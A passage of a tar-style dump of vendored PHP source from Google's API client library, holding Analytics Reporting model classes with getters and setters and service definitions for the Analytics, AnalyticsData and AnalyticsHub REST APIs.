getFiltersExpression() { return $this->filtersExpression; } /** * @param bool */ public function setHideTotals($hideTotals) { $this->hideTotals = $hideTotals; } /** * @return bool */ public function getHideTotals() { return $this->hideTotals; } /** * @param bool */ public function setHideValueRanges($hideValueRanges) { $this->hideValueRanges = $hideValueRanges; } /** * @return bool */ public function getHideValueRanges() { return $this->hideValueRanges; } /** * @param bool */ public function setIncludeEmptyRows($includeEmptyRows) { $this->includeEmptyRows = $includeEmptyRows; } /** * @return bool */ public function getIncludeEmptyRows() { return $this->includeEmptyRows; } /** * @param MetricFilterClause[] */ public function setMetricFilterClauses($metricFilterClauses) { $this->metricFilterClauses = $metricFilterClauses; } /** * @return MetricFilterClause[] */ public function getMetricFilterClauses() { return $this->metricFilterClauses; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param int */ public function setPageSize($pageSize) { $this->pageSize = $pageSize; } /** * @return int */ public function getPageSize() { return $this->pageSize; } /** * @param string */ public function setPageToken($pageToken) { $this->pageToken = $pageToken; } /** * @return string */ public function getPageToken() { return $this->pageToken; } /** * @param Pivot[] */ public function setPivots($pivots) { $this->pivots = $pivots; } /** * @return Pivot[] */ public function getPivots() { return $this->pivots; } /** * @param string */ public function setSamplingLevel($samplingLevel) { $this->samplingLevel = $samplingLevel; } /** * @return string */ public function getSamplingLevel() { return $this->samplingLevel; } /** * @param Segment[] */ public function setSegments($segments) { $this->segments = $segments; } /** * @return Segment[] */ public function getSegments() { return $this->segments; } /** * @param string */ public function setViewId($viewId) { $this->viewId = $viewId; } /** * @return string */ public function getViewId() { return $this->viewId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ReportRequest::class, 'Google_Service_AnalyticsReporting_ReportRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/OrFiltersForSegment.php000064400000002651147600400120026153 0ustar00segmentFilterClauses = $segmentFilterClauses; } /** * @return SegmentFilterClause[] */ public function getSegmentFilterClauses() { return $this->segmentFilterClauses; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OrFiltersForSegment::class, 'Google_Service_AnalyticsReporting_OrFiltersForSegment'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/GoalSetData.php000064400000002317147600400120024377 0ustar00goals = $goals; } /** * @return GoalData[] */ public function getGoals() { return $this->goals; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalSetData::class, 'Google_Service_AnalyticsReporting_GoalSetData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentFilter.php000064400000003655147600400120025025 0ustar00not = $not; } /** * @return bool */ public function getNot() { return $this->not; } /** * @param SequenceSegment */ public function setSequenceSegment(SequenceSegment $sequenceSegment) { $this->sequenceSegment = $sequenceSegment; } /** * @return SequenceSegment */ public function getSequenceSegment() { return $this->sequenceSegment; } /** * @param SimpleSegment */ public function setSimpleSegment(SimpleSegment $simpleSegment) { $this->simpleSegment = $simpleSegment; } /** * @return SimpleSegment */ public function getSimpleSegment() { return $this->simpleSegment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentFilter::class, 'Google_Service_AnalyticsReporting_SegmentFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/MetricHeader.php000064400000003423147600400120024602 0ustar00metricHeaderEntries = $metricHeaderEntries; } /** * @return MetricHeaderEntry[] */ public function getMetricHeaderEntries() { return $this->metricHeaderEntries; } /** * @param PivotHeader[] */ public function setPivotHeaders($pivotHeaders) { $this->pivotHeaders = $pivotHeaders; } /** * @return PivotHeader[] */ public function getPivotHeaders() { return $this->pivotHeaders; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricHeader::class, 'Google_Service_AnalyticsReporting_MetricHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Metric.php000064400000003174147600400120023474 0ustar00alias = $alias; } /** * @return string */ public function getAlias() { return $this->alias; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setFormattingType($formattingType) { $this->formattingType = $formattingType; } /** * @return string */ public function getFormattingType() { return $this->formattingType; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Metric::class, 'Google_Service_AnalyticsReporting_Metric'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentFilterClause.php000064400000003767147600400120026166 0ustar00dimensionFilter = $dimensionFilter; } /** * @return SegmentDimensionFilter */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param SegmentMetricFilter */ public function setMetricFilter(SegmentMetricFilter $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return SegmentMetricFilter */ public function getMetricFilter() { return $this->metricFilter; } /** * @param bool */ public function setNot($not) { $this->not = $not; } /** * @return bool */ public function getNot() { return $this->not; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentFilterClause::class, 'Google_Service_AnalyticsReporting_SegmentFilterClause'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Activity.php000064400000013032147600400120024037 0ustar00activityTime = $activityTime; } /** * @return string */ public function getActivityTime() { return $this->activityTime; } /** * @param string */ public function setActivityType($activityType) { $this->activityType = $activityType; } /** * @return string */ public function getActivityType() { return $this->activityType; } /** * @param ScreenviewData */ public function setAppview(ScreenviewData $appview) { $this->appview = $appview; } /** * @return ScreenviewData */ public function getAppview() { return $this->appview; } /** * @param string */ public function setCampaign($campaign) { $this->campaign = $campaign; } /** * @return string */ public function getCampaign() { return $this->campaign; } /** * @param string */ public function setChannelGrouping($channelGrouping) { $this->channelGrouping = $channelGrouping; } /** * @return string */ public function getChannelGrouping() { return $this->channelGrouping; } /** * @param CustomDimension[] */ public function setCustomDimension($customDimension) { $this->customDimension = $customDimension; } /** * @return CustomDimension[] */ public function getCustomDimension() { return $this->customDimension; } /** * @param EcommerceData */ public function setEcommerce(EcommerceData $ecommerce) { $this->ecommerce = $ecommerce; } /** * @return EcommerceData */ public function getEcommerce() { return $this->ecommerce; } /** * @param EventData */ public function setEvent(EventData $event) { $this->event = $event; } /** * @return EventData */ public function getEvent() { return $this->event; } /** * @param GoalSetData */ public function setGoals(GoalSetData $goals) { $this->goals = $goals; } /** * @return GoalSetData */ public function getGoals() { return $this->goals; } /** * @param string */ public function setHostname($hostname) { $this->hostname = $hostname; } /** * @return string */ public function getHostname() { return $this->hostname; } /** * @param string */ public function setKeyword($keyword) { $this->keyword = $keyword; } /** * @return string */ public function getKeyword() { return $this->keyword; } /** * @param string */ public function setLandingPagePath($landingPagePath) { $this->landingPagePath = $landingPagePath; } /** * @return string */ public function getLandingPagePath() { return $this->landingPagePath; } /** * @param string */ public function setMedium($medium) { $this->medium = $medium; } /** * @return string */ public function getMedium() { return $this->medium; } /** * @param PageviewData */ public function setPageview(PageviewData $pageview) { $this->pageview = $pageview; } /** * @return PageviewData */ public function getPageview() { return $this->pageview; } /** * @param string */ public function setSource($source) { $this->source = $source; } /** * @return string */ public function getSource() { return $this->source; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Activity::class, 'Google_Service_AnalyticsReporting_Activity'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Segment.php000064400000003021147600400120023642 0ustar00dynamicSegment = $dynamicSegment; } /** * @return DynamicSegment */ public function getDynamicSegment() { return $this->dynamicSegment; } /** * @param string */ public function setSegmentId($segmentId) { $this->segmentId = $segmentId; } /** * @return string */ public function getSegmentId() { return $this->segmentId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Segment::class, 'Google_Service_AnalyticsReporting_Segment'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/DateRangeValues.php000064400000003146147600400120025262 0ustar00pivotValueRegions = $pivotValueRegions; } /** * @return PivotValueRegion[] */ public function getPivotValueRegions() { return $this->pivotValueRegions; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DateRangeValues::class, 'Google_Service_AnalyticsReporting_DateRangeValues'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/CustomDimension.php000064400000002473147600400120025372 0ustar00index = $index; } /** * @return int */ public function getIndex() { return $this->index; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDimension::class, 'Google_Service_AnalyticsReporting_CustomDimension'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/GoalData.php000064400000006166147600400120023731 0ustar00goalCompletionLocation = $goalCompletionLocation; } /** * @return string */ public function getGoalCompletionLocation() { return $this->goalCompletionLocation; } /** * @param string */ public function setGoalCompletions($goalCompletions) { $this->goalCompletions = $goalCompletions; } /** * @return string */ public function getGoalCompletions() { return $this->goalCompletions; } /** * @param int */ public function setGoalIndex($goalIndex) { $this->goalIndex = $goalIndex; } /** * @return int */ public function getGoalIndex() { return $this->goalIndex; } /** * @param string */ public function setGoalName($goalName) { $this->goalName = $goalName; } /** * @return string */ public function getGoalName() { return $this->goalName; } /** * @param string */ public function setGoalPreviousStep1($goalPreviousStep1) { $this->goalPreviousStep1 = $goalPreviousStep1; } /** * @return string */ public function getGoalPreviousStep1() { return $this->goalPreviousStep1; } /** * @param string */ public function setGoalPreviousStep2($goalPreviousStep2) { $this->goalPreviousStep2 = $goalPreviousStep2; } /** * @return string */ public function getGoalPreviousStep2() { return $this->goalPreviousStep2; } /** * @param string */ public function setGoalPreviousStep3($goalPreviousStep3) { $this->goalPreviousStep3 = $goalPreviousStep3; } /** * @return string */ public function getGoalPreviousStep3() { return $this->goalPreviousStep3; } public function setGoalValue($goalValue) { $this->goalValue = $goalValue; } public function getGoalValue() { return $this->goalValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalData::class, 'Google_Service_AnalyticsReporting_GoalData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/MetricFilter.php000064400000003607147600400120024643 0ustar00comparisonValue = $comparisonValue; } /** * @return string */ public function getComparisonValue() { return $this->comparisonValue; } /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param bool */ public function setNot($not) { $this->not = $not; } /** * @return bool */ public function getNot() { return $this->not; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricFilter::class, 'Google_Service_AnalyticsReporting_MetricFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting.php000064400000005507147600400120022253 0ustar00 * Accesses Analytics report data.

* *

* For more information about this service, see the API * Documentation *

* * @author Google, Inc. */ class AnalyticsReporting extends \Google\Service { /** View and manage your Google Analytics data. */ const ANALYTICS = "https://www.googleapis.com/auth/analytics"; /** See and download your Google Analytics data. */ const ANALYTICS_READONLY = "https://www.googleapis.com/auth/analytics.readonly"; public $reports; public $userActivity; /** * Constructs the internal representation of the AnalyticsReporting service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analyticsreporting.googleapis.com/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v4'; $this->serviceName = 'analyticsreporting'; $this->reports = new AnalyticsReporting\Resource\Reports( $this, $this->serviceName, 'reports', [ 'methods' => [ 'batchGet' => [ 'path' => 'v4/reports:batchGet', 'httpMethod' => 'POST', 'parameters' => [], ], ] ] ); $this->userActivity = new AnalyticsReporting\Resource\UserActivity( $this, $this->serviceName, 'userActivity', [ 'methods' => [ 'search' => [ 'path' => 'v4/userActivity:search', 'httpMethod' => 'POST', 'parameters' => [], ], ] ] ); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AnalyticsReporting::class, 'Google_Service_AnalyticsReporting'); google-api/vendor/google/apiclient-services/src/AnalyticsHub.php000064400000035622147600400120021021 0ustar00 * Exchange data and analytics assets securely and efficiently.

* *

* For more information about this service, see the API * Documentation *

* * @author Google, Inc. */ class AnalyticsHub extends \Google\Service { /** View and manage your data in Google BigQuery and see the email address for your Google Account. */ const BIGQUERY = "https://www.googleapis.com/auth/bigquery"; /** See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.. */ const CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform"; public $organizations_locations_dataExchanges; public $projects_locations_dataExchanges; public $projects_locations_dataExchanges_listings; public $projects_locations_subscriptions; /** * Constructs the internal representation of the AnalyticsHub service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analyticshub.googleapis.com/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1'; $this->serviceName = 'analyticshub'; $this->organizations_locations_dataExchanges = new AnalyticsHub\Resource\OrganizationsLocationsDataExchanges( $this, $this->serviceName, 'dataExchanges', [ 'methods' => [ 'list' => [ 'path' => 'v1/{+organization}/dataExchanges', 'httpMethod' => 'GET', 'parameters' => [ 'organization' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ], ] ] ); $this->projects_locations_dataExchanges = new AnalyticsHub\Resource\ProjectsLocationsDataExchanges( $this, $this->serviceName, 'dataExchanges', [ 'methods' => [ 'create' => [ 'path' => 'v1/{+parent}/dataExchanges', 'httpMethod' => 'POST', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'dataExchangeId' => [ 'location' => 'query', 'type' => 'string', ], ], ],'delete' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'DELETE', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'getIamPolicy' => [ 'path' => 'v1/{+resource}:getIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'v1/{+parent}/dataExchanges', 'httpMethod' => 'GET', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'listSubscriptions' => [ 'path' => 'v1/{+resource}:listSubscriptions', 'httpMethod' => 'GET', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'includeDeletedSubscriptions' => [ 'location' => 'query', 'type' => 'boolean', ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'patch' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'PATCH', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'updateMask' => [ 'location' => 'query', 'type' => 'string', ], ], ],'setIamPolicy' => [ 'path' => 'v1/{+resource}:setIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'subscribe' => [ 'path' => 'v1/{+name}:subscribe', 'httpMethod' => 'POST', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'testIamPermissions' => [ 'path' => 'v1/{+resource}:testIamPermissions', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->projects_locations_dataExchanges_listings = new AnalyticsHub\Resource\ProjectsLocationsDataExchangesListings( $this, $this->serviceName, 'listings', [ 'methods' => [ 'create' => [ 'path' => 'v1/{+parent}/listings', 'httpMethod' => 'POST', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'listingId' => [ 'location' => 'query', 'type' => 'string', ], ], ],'delete' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'DELETE', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'getIamPolicy' => [ 'path' => 'v1/{+resource}:getIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'v1/{+parent}/listings', 'httpMethod' => 'GET', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'listSubscriptions' => [ 'path' => 'v1/{+resource}:listSubscriptions', 'httpMethod' => 'GET', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'includeDeletedSubscriptions' => [ 'location' => 'query', 'type' => 'boolean', ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'patch' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'PATCH', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'updateMask' => [ 'location' => 'query', 'type' => 'string', ], ], ],'setIamPolicy' => [ 'path' => 'v1/{+resource}:setIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'subscribe' => [ 'path' => 'v1/{+name}:subscribe', 'httpMethod' => 'POST', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'testIamPermissions' => [ 'path' => 'v1/{+resource}:testIamPermissions', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->projects_locations_subscriptions = new AnalyticsHub\Resource\ProjectsLocationsSubscriptions( $this, $this->serviceName, 'subscriptions', [ 'methods' => [ 'delete' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'DELETE', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'v1/{+name}', 'httpMethod' => 'GET', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'getIamPolicy' => [ 'path' => 'v1/{+resource}:getIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'v1/{+parent}/subscriptions', 'httpMethod' => 'GET', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'filter' => [ 'location' => 'query', 'type' => 'string', ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'refresh' => [ 'path' => 'v1/{+name}:refresh', 'httpMethod' => 'POST', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'revoke' => [ 'path' => 'v1/{+name}:revoke', 'httpMethod' => 'POST', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'setIamPolicy' => [ 'path' => 'v1/{+resource}:setIamPolicy', 'httpMethod' => 'POST', 'parameters' => [ 'resource' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AnalyticsHub::class, 'Google_Service_AnalyticsHub'); google-api/vendor/google/apiclient-services/src/AnalyticsData.php000064400000015650147600400120021153 0ustar00 * Accesses report data in Google Analytics. Warning: Creating multiple Customer * Applications, Accounts, or Projects to simulate or act as a single Customer * Application, Account, or Project (respectively) or to circumvent Service- * specific usage limits or quotas is a direct violation of Google Cloud * Platform Terms of Service as well as Google APIs Terms of Service. These * actions can result in immediate termination of your GCP project(s) without * any warning.

* *

* For more information about this service, see the API * Documentation *

* * @author Google, Inc. */ class AnalyticsData extends \Google\Service { /** View and manage your Google Analytics data. */ const ANALYTICS = "https://www.googleapis.com/auth/analytics"; /** See and download your Google Analytics data. */ const ANALYTICS_READONLY = "https://www.googleapis.com/auth/analytics.readonly"; public $properties; public $properties_audienceExports; /** * Constructs the internal representation of the AnalyticsData service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analyticsdata.googleapis.com/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1beta'; $this->serviceName = 'analyticsdata'; $this->properties = new AnalyticsData\Resource\Properties( $this, $this->serviceName, 'properties', [ 'methods' => [ 'batchRunPivotReports' => [ 'path' => 'v1beta/{+property}:batchRunPivotReports', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'batchRunReports' => [ 'path' => 'v1beta/{+property}:batchRunReports', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'checkCompatibility' => [ 'path' => 'v1beta/{+property}:checkCompatibility', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'getMetadata' => [ 'path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'runPivotReport' => [ 'path' => 'v1beta/{+property}:runPivotReport', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'runRealtimeReport' => [ 'path' => 'v1beta/{+property}:runRealtimeReport', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'runReport' => [ 'path' => 'v1beta/{+property}:runReport', 'httpMethod' => 'POST', 'parameters' => [ 'property' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); $this->properties_audienceExports = new AnalyticsData\Resource\PropertiesAudienceExports( $this, $this->serviceName, 'audienceExports', [ 'methods' => [ 'create' => [ 'path' => 'v1beta/{+parent}/audienceExports', 'httpMethod' => 'POST', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'get' => [ 'path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'v1beta/{+parent}/audienceExports', 'httpMethod' => 'GET', 'parameters' => [ 'parent' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'pageSize' => [ 'location' => 'query', 'type' => 'integer', ], 'pageToken' => [ 'location' => 'query', 'type' => 'string', ], ], ],'query' => [ 'path' => 'v1beta/{+name}:query', 'httpMethod' => 'POST', 'parameters' => [ 'name' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ], ] ] ); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AnalyticsData::class, 'Google_Service_AnalyticsData'); google-api/vendor/google/apiclient-services/src/Analytics.php000064400000223227147600400120020362 0ustar00 * Views and manages your Google Analytics data.

* *

* For more information about this service, see the API * Documentation *

* * @author Google, Inc. */ class Analytics extends \Google\Service { /** View and manage your Google Analytics data. */ const ANALYTICS = "https://www.googleapis.com/auth/analytics"; /** Edit Google Analytics management entities. */ const ANALYTICS_EDIT = "https://www.googleapis.com/auth/analytics.edit"; /** Manage Google Analytics Account users by email address. */ const ANALYTICS_MANAGE_USERS = "https://www.googleapis.com/auth/analytics.manage.users"; /** View Google Analytics user permissions. */ const ANALYTICS_MANAGE_USERS_READONLY = "https://www.googleapis.com/auth/analytics.manage.users.readonly"; /** Create a new Google Analytics account along with its default property and view. */ const ANALYTICS_PROVISION = "https://www.googleapis.com/auth/analytics.provision"; /** View your Google Analytics data. */ const ANALYTICS_READONLY = "https://www.googleapis.com/auth/analytics.readonly"; /** Manage Google Analytics user deletion requests. */ const ANALYTICS_USER_DELETION = "https://www.googleapis.com/auth/analytics.user.deletion"; public $data_ga; public $data_mcf; public $data_realtime; public $management_accountSummaries; public $management_accountUserLinks; public $management_accounts; public $management_clientId; public $management_customDataSources; public $management_customDimensions; public $management_customMetrics; public $management_experiments; public $management_filters; public $management_goals; public $management_profileFilterLinks; public $management_profileUserLinks; public $management_profiles; public $management_remarketingAudience; public $management_segments; public $management_unsampledReports; public $management_uploads; public $management_webPropertyAdWordsLinks; public $management_webproperties; public $management_webpropertyUserLinks; public $metadata_columns; public $provisioning; public $userDeletion_userDeletionRequest; /** * Constructs the internal representation of the Analytics service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analytics.googleapis.com/'; $this->servicePath = 'analytics/v3/'; $this->batchPath = 'batch/analytics/v3'; $this->version = 'v3'; $this->serviceName = 'analytics'; $this->data_ga = new Analytics\Resource\DataGa( $this, $this->serviceName, 'ga', [ 'methods' => [ 'get' => [ 'path' => 'data/ga', 'httpMethod' => 'GET', 'parameters' => [ 'ids' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'start-date' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'end-date' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'metrics' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'dimensions' => [ 'location' => 'query', 'type' => 'string', ], 'filters' => [ 'location' => 'query', 'type' => 'string', ], 'include-empty-rows' => [ 'location' => 'query', 'type' => 'boolean', ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'output' => [ 'location' => 'query', 'type' => 'string', ], 'samplingLevel' => [ 'location' => 'query', 'type' => 'string', ], 'segment' => [ 'location' => 'query', 'type' => 'string', ], 'sort' => [ 'location' => 'query', 'type' => 'string', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->data_mcf = new Analytics\Resource\DataMcf( $this, $this->serviceName, 'mcf', [ 'methods' => [ 'get' => [ 'path' => 'data/mcf', 'httpMethod' => 'GET', 'parameters' => [ 'ids' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'start-date' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'end-date' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'metrics' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'dimensions' => [ 'location' => 'query', 'type' => 'string', ], 'filters' => [ 'location' => 'query', 'type' => 'string', ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'samplingLevel' => [ 'location' => 'query', 'type' => 'string', ], 'sort' => [ 'location' => 'query', 'type' => 'string', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->data_realtime = new Analytics\Resource\DataRealtime( $this, $this->serviceName, 'realtime', [ 'methods' => [ 'get' => [ 'path' => 'data/realtime', 'httpMethod' => 'GET', 'parameters' => [ 'ids' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'metrics' => [ 'location' => 'query', 'type' => 'string', 'required' => true, ], 'dimensions' => [ 'location' => 'query', 'type' => 'string', ], 'filters' => [ 'location' => 'query', 'type' => 'string', ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'sort' => [ 'location' => 'query', 'type' => 'string', ], ], ], ] ] ); $this->management_accountSummaries = new Analytics\Resource\ManagementAccountSummaries( $this, $this->serviceName, 'accountSummaries', [ 'methods' => [ 'list' => [ 'path' => 'management/accountSummaries', 'httpMethod' => 'GET', 'parameters' => [ 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ], ] ] ); $this->management_accountUserLinks = new Analytics\Resource\ManagementAccountUserLinks( $this, $this->serviceName, 'accountUserLinks', [ 'methods' => [ 'delete' => [ 'path' => 'management/accounts/{accountId}/entityUserLinks/{linkId}', 'httpMethod' => 'DELETE', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'linkId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'insert' => [ 'path' => 'management/accounts/{accountId}/entityUserLinks', 'httpMethod' => 'POST', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], ], ],'list' => [ 'path' => 'management/accounts/{accountId}/entityUserLinks', 'httpMethod' => 'GET', 'parameters' => [ 'accountId' => [ 'location' => 'path', 'type' => 'string', 'required' => true, ], 'max-results' => [ 'location' => 'query', 'type' => 'integer', ], 'start-index' => [ 'location' => 'query', 'type' => 'integer', ], ], ],'update' => [ 'path' => 'management/accounts/{accountId}/entityUserLinks/{linkId}', 'httpMethod' => 'PUT', 'parameters' 